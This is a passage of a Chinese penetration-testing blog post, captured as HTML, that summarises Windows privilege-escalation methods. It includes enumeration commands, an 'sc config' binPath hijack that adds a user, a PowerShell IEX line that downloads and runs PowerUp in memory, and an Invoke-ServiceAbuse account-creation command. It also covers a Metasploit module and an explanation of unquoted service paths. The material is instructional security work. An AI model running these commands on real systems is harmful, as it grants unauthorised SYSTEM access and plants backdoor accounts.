<!DOCTYPE html>
<html lang="zh-cn">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
        <title>Windows 提权方式总结 - Geekby&#39;s Blog</title><meta name="Description" content="Windows 提权方式总结"><meta property="og:title" content="Windows 提权方式总结" />
<meta property="og:description" content="Windows 提权方式总结" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-01-26T09:05:00+08:00" />
<meta property="article:modified_time" content="2021-01-26T09:05:00+08:00" />

<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Windows 提权方式总结"/>
<meta name="twitter:description" content="Windows 提权方式总结"/>
<meta name="application-name" content="Geekby&#39;s Blog">
<meta name="apple-mobile-web-app-title" content="Geekby&#39;s Blog"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://www.geekby.site/2021/01/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/" /><link rel="prev" href="https://www.geekby.site/2021/01/%E7%BA%A2%E8%93%9D%E5%AF%B9%E6%8A%97%E4%B8%ADrdp%E5%8D%8F%E8%AE%AE%E7%9A%84%E5%88%A9%E7%94%A8/" /><link rel="next" href="https://www.geekby.site/2021/01/cve-2021-3156%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" /><link rel="stylesheet" href="/lib/normalize/normalize.min.css"><link rel="stylesheet" href="/css/style.min.css"><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"><link rel="stylesheet" href="/lib/animate/animate.min.css"><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "Windows 提权方式总结",
        "inLanguage": "zh-cn",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/www.geekby.site\/2021\/01\/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93\/"
        },"image": ["https:\/\/www.geekby.site\/logo.png"],"genre": "posts","keywords": "渗透测试, 提权","wordcount":  1299 ,
        "url": "https:\/\/www.geekby.site\/2021\/01\/windows%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93\/","datePublished": "2021-01-26T09:05:00+08:00","dateModified": "2021-01-26T09:05:00+08:00","publisher": {
            "@type": "Organization",
            "name": "Geekby","logo": {
                    "@type": "ImageObject",
                    "url": "https:\/\/www.geekby.site\/images\/avatar.png",
                    "width":  358 ,
                    "height":  330 
                }},"author": {
                "@type": "Person",
                "name": "Geekby"
            },"description": "Windows 提权方式总结"
    }
    </script></head>
    <body header-desktop="" header-mobile=""><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('auto' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'auto' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i> 文章 </a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i> 标签 </a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i> 分类 </a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i> 关于 </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="输入关键字" id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                    <i class="fas fa-adjust fa-fw"></i>
                </a>
            </div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="Geekby&#39;s Blog">Geekby&#39;s Blog</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="输入关键字" id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="搜索">
                            <i class="fas fa-search fa-fw"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="清空">
                            <i class="fas fa-times-circle fa-fw"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        取消
                    </a>
                </div><a class="menu-item" href="/posts/" title="文章"><i class="fas fa-inbox"></i>文章</a><a class="menu-item" href="/tags/" title="标签"><i class="fas fa-tags"></i>标签</a><a class="menu-item" href="/categories/" title="分类"><i class="fas fa-sort-amount-up-alt"></i>分类</a><a class="menu-item" href="/about/" title="关于"><i class="far fa-address-card"></i>关于</a><a href="javascript:void(0);" class="menu-item theme-switch" title="切换主题">
                <i class="fas fa-adjust fa-fw"></i>
            </a></div>
    </div>
</header>
<div class="search-dropdown desktop">
    <div id="search-dropdown-desktop"></div>
</div>
<div class="search-dropdown mobile">
    <div id="search-dropdown-mobile"></div>
</div>
<main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">目录</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animated flipInX">Windows 提权方式总结</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="/" title="Author" rel=" author" class="author"><i class="fas fa-user-circle fa-fw"></i>Geekby</a></span>&nbsp;<span class="post-category">收录于 <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"><i class="far fa-folder fa-fw"></i>渗透测试</a>&nbsp;<a href="/categories/%E6%8F%90%E6%9D%83/"><i class="far fa-folder fa-fw"></i>提权</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw"></i>&nbsp;<time datetime="2021-01-26">2021-01-26</time>&nbsp;<i class="fas fa-pencil-alt fa-fw"></i>&nbsp;约 1299 字&nbsp;
                <i class="far fa-clock fa-fw"></i>&nbsp;预计阅读 7 分钟&nbsp;</div>
        </div><div class="details toc" id="toc-static"  kept="">
                <div class="details-summary toc-title">
                    <span>目录</span>
                    <span><i class="details-icon fas fa-angle-right"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#1-前言">1 前言</a>
      <ul>
        <li><a href="#11-提权基础命令">1.1 提权基础命令</a></li>
        <li><a href="#12-windows-权限划分">1.2 Windows 权限划分</a></li>
        <li><a href="#13-常见-webshell-所处的权限">1.3 常见 webshell 所处的权限</a></li>
      </ul>
    </li>
    <li><a href="#2-系统内核提权">2 系统内核提权</a></li>
    <li><a href="#3-配置不当提权">3 配置不当提权</a>
      <ul>
        <li><a href="#31-系统服务权限配置错误">3.1 系统服务权限配置错误</a>
          <ul>
            <li><a href="#311-accesschk">3.1.1 accesschk</a></li>
            <li><a href="#312-powersploit">3.1.2 PowerSploit</a></li>
            <li><a href="#313-metasploit">3.1.3 metasploit</a></li>
          </ul>
        </li>
        <li><a href="#32-可信任服务路径提权">3.2 可信任服务路径提权</a>
          <ul>
            <li><a href="#321-检查">3.2.1 检查</a></li>
            <li><a href="#322-利用">3.2.2 利用</a></li>
            <li><a href="#333-msf-中的模块">3.3.3 msf 中的模块</a></li>
          </ul>
        </li>
        <li><a href="#33-计划任务提权">3.3 计划任务提权</a></li>
      </ul>
    </li>
    <li><a href="#4-alwaysinstallelevated-提权">4 AlwaysInstallElevated 提权</a>
      <ul>
        <li><a href="#41-查询">4.1 查询</a></li>
        <li><a href="#42-开启">4.2 开启</a></li>
        <li><a href="#43-执行-msi-文件">4.3 执行 MSI 文件</a></li>
        <li><a href="#44-利用">4.4 利用</a>
          <ul>
            <li><a href="#441-powerup-脚本">4.4.1 PowerUP 脚本</a></li>
            <li><a href="#442-msi-wrapper-添加用户">4.4.2 MSI Wrapper 添加用户</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#5-无人值守安装文件">5 无人值守安装文件</a></li>
    <li><a href="#6-dll-劫持提权">6 DLL 劫持提权</a>
      <ul>
        <li><a href="#61-相关概念">6.1 相关概念</a>
          <ul>
            <li><a href="#611-dll-简介">6.1.1 DLL 简介</a></li>
            <li><a href="#612-dll-的加载顺序">6.1.2 DLL 的加载顺序</a></li>
            <li><a href="#613-分析-dll-的加载过程---process-monitor">6.1.3 分析 DLL 的加载过程 - Process Monitor</a></li>
            <li><a href="#614-dll-劫持步骤">6.1.4 DLL 劫持步骤</a></li>
          </ul>
        </li>
        <li><a href="#62-实现">6.2 实现</a>
          <ul>
            <li><a href="#621-实现一个-dll-劫持">6.2.1 实现一个 DLL 劫持</a></li>
            <li><a href="#622-msf">6.2.2 msf</a></li>
          </ul>
        </li>
        <li><a href="#63-自动化工具检测">6.3 自动化工具检测</a>
          <ul>
            <li><a href="#631-rattler">6.3.1 rattler</a></li>
            <li><a href="#632-chkdllhijack">6.3.2 ChkDllHijack</a></li>
          </ul>
        </li>
        <li><a href="#64-dll-side-loadingdll-proxy-loading">6.4 DLL Side-Loading(DLL Proxy Loading)</a>
          <ul>
            <li><a href="#641-原理">6.4.1 原理</a></li>
            <li><a href="#642-利用">6.4.2 利用</a></li>
          </ul>
        </li>
      </ul>
    </li>
    <li><a href="#7-bypass-uac">7 Bypass UAC</a>
      <ul>
        <li><a href="#71-原理及概念">7.1 原理及概念</a>
          <ul>
            <li><a href="#711-uac-的实现">7.1.1 UAC 的实现</a></li>
            <li><a href="#712-配置-uac-策略">7.1.2 配置 UAC 策略</a></li>
            <li><a href="#713-提示-uac-的情况">7.1.3 提示 UAC 的情况</a></li>
          </ul>
        </li>
        <li><a href="#72-auto-elevate-自动提升权限分析">7.2 auto Elevate 自动提升权限分析</a>
          <ul>
            <li><a href="#721-寻找-auto-elevate">7.2.1 寻找 auto Elevate</a></li>
            <li><a href="#722-手动-bypass-uac">7.2.2 手动 bypass UAC</a></li>
          </ul>
        </li>
        <li><a href="#73-利用注册表-bypass-uac">7.3 利用注册表 bypass UAC</a></li>
        <li><a href="#74-uacme">7.4 UACME</a></li>
      </ul>
    </li>
    <li><a href="#8-自动化检测">8 自动化检测</a></li>
    <li><a href="#9-土豆类提权">9 土豆类提权</a></li>
    <li><a href="#10-参考">10 参考</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h1 id="windows-提权方式总结">Windows 提权方式总结</h1>
<h2 id="1-前言">1 前言</h2>
<h3 id="11-提权基础命令">1.1 提权基础命令</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 查询系统信息</span>
</span></span><span class="line"><span class="cl">systeminfo 
</span></span><span class="line"><span class="cl"><span class="c1"># 如果要查看特定的信息，可以使用</span>
</span></span><span class="line"><span class="cl">systeminfo <span class="p">|</span> findstr /B /C:<span class="s2">&#34;OS名称&#34;</span> /C:<span class="s2">&#34;OS版本&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 主机名</span>
</span></span><span class="line"><span class="cl">Hostname
</span></span><span class="line"><span class="cl"><span class="c1"># 环境变量</span>
</span></span><span class="line"><span class="cl">Set
</span></span><span class="line"><span class="cl"><span class="c1"># 查看用户信息</span>
</span></span><span class="line"><span class="cl">Net user
</span></span><span class="line"><span class="cl"><span class="c1"># 查看服务 pid 号</span>
</span></span><span class="line"><span class="cl">tasklist /svc<span class="p">|</span>find <span class="s2">&#34;TermService&#34;</span>
</span></span><span class="line"><span class="cl">netstat -ano<span class="p">|</span>find <span class="s2">&#34;3389&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 查看系统名</span>
</span></span><span class="line"><span class="cl">wmic os get caption
</span></span><span class="line"><span class="cl"><span class="c1"># 查看补丁信息</span>
</span></span><span class="line"><span class="cl">wmic qfe get Description,HotFixID,InstalledOn
</span></span><span class="line"><span class="cl"><span class="c1"># 如果要定位到特定的补丁可以使用如下命令</span>
</span></span><span class="line"><span class="cl">wmic qfe get Description,HotFixID,InstalledOn <span class="p">|</span> findstr /C:<span class="s2">&#34;KB4346084&#34;</span> /C:<span class="s2">&#34;KB4509094&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># 查看当前安装程序</span>
</span></span><span class="line"><span class="cl">wmic product get name,version
</span></span></code></pre></td></tr></table>
</div>
</div><p>其中需要注意一下 <code>环境变量</code>，因为有的软件环境变量可能设置在其它路径中，而在该路径下的文件是具有写权限的，就可以通过<strong>替换文件</strong>来达到提权操作</p>
<h3 id="12-windows-权限划分">1.2 Windows 权限划分</h3>
<ul>
<li>
<p>User：普通用户权限，系统中最安全的权限，分配给该组的默认权限不允许成员修改操作系统的设置或用户资料</p>
</li>
<li>
<p>Administrator：管理员权限，可以利用 Windows 的机制将自己提升为 System 权限，以便操作 SAM 文件等</p>
</li>
<li>
<p>System：系统权限，可以对 SAM 等敏感文件进行读取，往往需要 Administrator 权限提升到 System 权限才可以对散列值进行 Dump 操作</p>
</li>
<li>
<p>TrustedInstaller：最高权限， 对于系统文件，即使 System 权限也无法进行修改，只有 TrustedInstaller 权限才可以修改文件</p>
</li>
</ul>
<h3 id="13-常见-webshell-所处的权限">1.3 常见 webshell 所处的权限</h3>
<p>通常的 webshell 权限如下：</p>
<ul>
<li>ASP、PHP - 匿名权限</li>
<li>ASPX - user 权限</li>
<li>JSP - 通常是系统权限</li>
</ul>
<h2 id="2-系统内核提权">2 系统内核提权</h2>
<p>此提权方法即是通过系统本身存在的一些漏洞，未曾打相应的补丁而暴露出来的提权方法，依托可以提升权限的 EXP 和它们的补丁编号，进行提升权限。</p>
<p>检查：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">systeminfo
</span></span><span class="line"><span class="cl">wmic qfe get Caption,Description,HotFixID,InstalledOn
</span></span><span class="line"><span class="cl"><span class="c1"># msf</span>
</span></span><span class="line"><span class="cl">post/windows/gather/enum_patches
</span></span><span class="line"><span class="cl">Windows-Exploit-Suggester
</span></span></code></pre></td></tr></table>
</div>
</div><p>下面是辅助提权的页面：</p>
<ul>
<li><a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank" rel="noopener noreffer">https://github.com/SecWiki/windows-kernel-exploits</a></li>
<li><a href="https://wiki.0-sec.org/#/index" target="_blank" rel="noopener noreffer">https://wiki.0-sec.org/#/index</a></li>
<li><a href="https://github.com/neargle/win-powerup-exp-index" target="_blank" rel="noopener noreffer">https://github.com/neargle/win-powerup-exp-index</a></li>
<li><a href="http://blog.neargle.com/win-powerup-exp-index/" target="_blank" rel="noopener noreffer">http://blog.neargle.com/win-powerup-exp-index/</a></li>
<li><a href="https://detect.secwx.com" target="_blank" rel="noopener noreffer">https://detect.secwx.com</a></li>
</ul>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127094545.png-water_print" /></p>
<h2 id="3-配置不当提权">3 配置不当提权</h2>
<h3 id="31-系统服务权限配置错误">3.1 系统服务权限配置错误</h3>
<p>Windows 系统服务文件在操作系统启动时加载并执行，并调用可执行文件。因此，如果一个低权限用户对这些调用的可执行文件拥有可写权限，就可以将该文件替换成任意可执行文件，并随着系统服务的启动获得系统权限，但一般情况下，Windows 是以 System 权限执行的，因此，其文件夹、文件和注册表键值都是受到强访问控制机制保护的，但在某些情况下仍有些服务没有得到有效保护。</p>
<h4 id="311-accesschk">3.1.1 accesschk</h4>
<p>下载地址：<a href="https://download.sysinternals.com/files/SysinternalsSuite.zip" target="_blank" rel="noopener noreffer">https://download.sysinternals.com/files/SysinternalsSuite.zip</a></p>
<ul>
<li>用 accesschk.exe 工具查看当前用户可修改的服务：</li>
</ul>
<p><code>accesschk.exe -uwcqv &quot;XXX&quot; * /accepteula &gt; 1.txt   //XXX为当前用户名</code></p>
<p>如果出现 SERVICE_ALL_ACCESS 则表示当前用户拥有修改该服务的权限</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104057.png-water_print" /></p>
<ul>
<li>查看该服务启动时的权限</li>
</ul>
<p><code>sc qc VMTools</code></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127104148.png-water_print" /></p>
<ul>
<li>然后修改执行文件路径为我们想要执行的命令</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># 注意这里的&#34;=&#34;后面要留有空格</span>
</span></span><span class="line"><span class="cl">sc config VMTools <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&#34;net user test1 abc123! /add&#34;</span>  
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 查看查询该服务的执行路径是否修改成功</span>
</span></span><span class="line"><span class="cl">sc qc VMTools  
</span></span></code></pre></td></tr></table>
</div>
</div><ul>
<li>重启服务</li>
</ul>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sc stop VMTools
</span></span><span class="line"><span class="cl">sc start VMTools
</span></span></code></pre></td></tr></table>
</div>
</div><p>但要注意这里启动时会报错，因为当一个服务在 Windows 系统中启动后，它必须和服务控制管理器通信。如果没有通信，服务控制管理器会认为出现了错误，并会终止这个进程。但是我们的命令已经以 SYSTEM 权限运行了，并且成功添加了一个用户。</p>
<div class="details admonition info open">
        <div class="details-summary admonition-title">
            <i class="icon fas fa-info-circle fa-fw"></i>信息<i class="details-icon fas fa-angle-right fa-fw"></i>
        </div>
        <div class="details-content">
            <div class="admonition-content"><p>利用系统自带的 icacls 也可以：</p>
<p>确定写入权限：<code>icacls &quot;C:\Program Files\program folder&quot;</code></p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127101438.png-water_print" /></p>
<p>「M」表示修改、「F」表示完全控制</p>
<p>「CI」代表从属容器将继承访问控制项</p>
<p>「OI」代表从属文件将继承访问控制项</p>
<p>常用命令：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files\*&#34;</span> 2&gt;nul <span class="p">|</span> findstr <span class="s2">&#34;(M)&#34;</span> <span class="p">|</span> findstr <span class="s2">&#34;Everyone&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files(x86)\*&#34;</span> 2&gt;nul <span class="p">|</span> findstr <span class="s2">&#34;(M)&#34;</span> <span class="p">|</span> findstr <span class="s2">&#34;Everyone&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files\*&#34;</span> 2&gt;nul <span class="p">|</span> findstr <span class="s2">&#34;(M)&#34;</span> <span class="p">|</span> findstr <span class="s2">&#34;BUILTIN\Users&#34;</span>
</span></span><span class="line"><span class="cl">icacls <span class="s2">&#34;C:\Program Files(x86)\*&#34;</span> 2&gt;nul <span class="p">|</span> findstr <span class="s2">&#34;(M)&#34;</span> <span class="p">|</span> findstr <span class="s2">&#34;BUILTIN\Users&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div></div>
        </div>
    </div>
<h4 id="312-powersploit">3.1.2 PowerSploit</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="n">powershell</span><span class="p">.</span><span class="n">exe</span> <span class="n">-exec</span> <span class="n">bypass</span> <span class="n">-nop</span> <span class="n">-c</span> <span class="s2">&#34;IEX (New-Object Net.WebClient).DownloadString(&#39;https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1&#39;); Invoke-AllChecks&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">powershell</span><span class="p">.</span><span class="n">exe</span> <span class="n">-exec</span> <span class="n">bypass</span> <span class="n">-Command</span> <span class="s2">&#34;&amp; {Import-Module D:/PowerUp.ps1; Invoke-AllChecks}&#34;</span> <span class="p">&gt;</span> <span class="n">1</span><span class="p">.</span><span class="n">txt</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>列出了所有可能存在问题的服务：</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105304.png-water_print" /></p>
<ul>
<li>ServiceName：可能存在漏洞的服务</li>
<li>Path：该服务的可执行程序的路径</li>
<li>StartName：服务运行账号</li>
<li>AbuseFunction：利用方式</li>
</ul>
<p>根据 AbuseFunction 中的利用方式执行脚本，这里以 VGAuthService 服务为例</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print"
        data-srcset="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print 1.5x, https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print 2x"
        data-sizes="auto"
        alt="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print"
        title="https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20210127105407.png-water_print" /></p>
<p>添加一个名为 user，密码为 123456 的账号：</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="n">powershell</span><span class="p">.</span><span class="n">exe</span> <span class="n">-exec</span> <span class="n">bypass</span> <span class="n">-Command</span> <span class="s2">&#34;&amp; {Import-Module C:/PowerUp.ps1;Invoke-ServiceAbuse -Name &#39;VGAuthService&#39; -Username user -Password 123456}&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="313-metasploit">3.1.3 metasploit</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">use exploit/windows/local/service_permissions
</span></span><span class="line"><span class="cl"><span class="nb">set</span> AGGRESSIVE <span class="nb">true</span>
</span></span><span class="line"><span class="cl"><span class="nb">set</span> session <span class="m">1</span>
</span></span><span class="line"><span class="cl">exploit
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="32-可信任服务路径提权">3.2 可信任服务路径提权</h3>
<p>可信任服务路径漏洞利用了 Windows 文件路径解析的特性，如果一个服务调用的可执行文件没有正确地处理所引用的完整路径名，同时攻击者该文件路径有可写权限，攻击者就可以上传文件来劫持路径名。</p>
<p>例如 Windows 系统启动某服务时查找的文件路径为 <code>C:\Program Files\Some Folder\Services.exe</code>。</p>
<p>对于该路径中的每一个空格，Windows 都会尝试并执行与空格前面的名字相匹配的程序，因此 Windows 会以依次如下顺序查找一下启动程序：</p>
<ul>
<li>C:\Program.exe</li>
<li>C:\Program Files\Some.exe</li>
<li>C:\Program Files\Some Folder\Services.exe</li>
</ul>
<p>此时如果我们对 C:\路径或者 C:\Program Files 有可写的权限，就可以上传 Program.exe 或 Some.exe 程序到相应目录下，当服务重新启动时，就会以 System 权限执行我们上传的恶意程序。</p>
<p>利用条件：</p>
<ul>
<li>服务路径未使用双引号</li>
<li>服务路径包含空格</li>
<li>我们有某一中间文件夹的写权限</li>
</ul>
<h4 id="321-检查">3.2.1 检查</h4>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
